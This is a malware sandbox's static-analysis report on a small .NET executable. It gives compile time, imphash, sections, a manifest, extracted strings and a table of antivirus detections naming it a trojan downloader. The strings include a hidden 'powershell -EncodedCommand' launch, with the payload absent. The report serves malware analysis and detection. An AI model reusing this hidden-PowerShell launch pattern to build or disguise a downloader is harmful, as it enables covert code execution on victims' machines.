Static | ZeroBOX

PE Compile Time

2022-11-17 01:36:28

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x00000c04    0x00000e00        3.56049173123
.rsrc   0x00004000       0x000005b0    0x00000600        4.33475280473
.reloc  0x00006000       0x0000000c    0x00000200        0.0611628522412

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x000040a0  0x00000264  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x00004308  0x000002a4  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, ASCII text

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
hjasgfhjasgdas.exe
cvyttwkjunfgwvmjlrv
mscorlib
System
Object
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
hjasgfhjasgdas
System.Diagnostics
ProcessStartInfo
set_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
set_CreateNoWindow
Process
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8" ?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="7.4.9.4" name="jppdgxhykpfleqzznvfueyxqiqqwwdlgadc" />
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</asmv1:assembly>
powershell
-EncodedCommand "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"
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
hjasgfhjasgdas.exe
LegalCopyright
OriginalFilename
hjasgfhjasgdas.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Clean
tehtris Clean
MicroWorld-eScan Gen:Variant.Marsilia.2083
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Gen:Variant.Marsilia.2083
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Gen:Variant.Marsilia.2083
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Cyren W32/MSIL_Agent.DIE.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.MAE
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Alibaba Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Tencent Clean
Ad-Aware Gen:Variant.Marsilia.2083
Sophos Clean
Comodo Clean
F-Secure Trojan.TR/Dldr.Agent.nhtye
DrWeb Clean
VIPRE Gen:Variant.Marsilia.2083
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.xz
Trapmine Clean
FireEye Generic.mg.378deda0d1313deb
Emsisoft Gen:Variant.Marsilia.2083 (B)
Ikarus Trojan.MSIL.CoinMiner
GData Gen:Variant.Marsilia.2083
Jiangmin Clean
Webroot Clean
Avira TR/Dldr.Agent.nhtye
MAX malware (ai score=82)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.Marsilia.D823
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Microsoft Trojan:MSIL/AsyncRat.NEAG!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5148890
Acronis Clean
McAfee Artemis!378DEDA0D131
TACHYON Clean
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Suspicious PE
MaxSecure Clean
Fortinet MSIL/Agent.MAE!tr
BitDefenderTheta Gen:NN.ZemsilF.36106.am0@aS36YZf
AVG Win32:Trojan-gen
Avast Win32:Trojan-gen
No IRMA results available.